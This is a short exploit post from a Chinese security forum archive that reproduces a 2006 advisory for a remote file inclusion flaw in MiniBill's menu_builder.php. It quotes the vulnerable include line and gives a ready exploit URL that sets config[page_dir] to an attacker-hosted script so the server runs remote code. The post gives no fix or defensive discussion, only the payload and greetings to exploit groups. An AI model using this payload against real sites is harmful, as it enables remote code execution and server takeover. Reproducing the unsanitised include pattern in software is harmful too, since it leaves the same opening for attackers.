邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » MiniBill <= 20061010 (menu_builder.php) File Include Vulnerability [查看完整版本]

pub!1c 2006-10-27 11:46

MiniBill <= 20061010 (menu_builder.php) File Include Vulnerability

[code]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MiniBILL v2006-10-10 (config[page_dir] Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

line 71: include($config['page_dir']."menu.php");


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

[url]http://www.hedef.com/[/url][script_path]/include/menu_builder.php?config[page_dir]=http://evil_script?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, kacper, Preddy, chaos ,nukedx, SHiKaA, DJR

[url]www.milw0rm.com[/url]
[url]www.team-rootshell.com[/url]
[url]www.cyber-warrior.org[/url]
irc.milw0rm.com #milw0rm

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

script url: [url]http://www.ultrize.com/minibill/index.php?page=download[/url]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[/code]

查看完整版本: MiniBill <= 20061010 (menu_builder.php) File Include Vulnerability

© 1999-2008 EvilOctal Security Team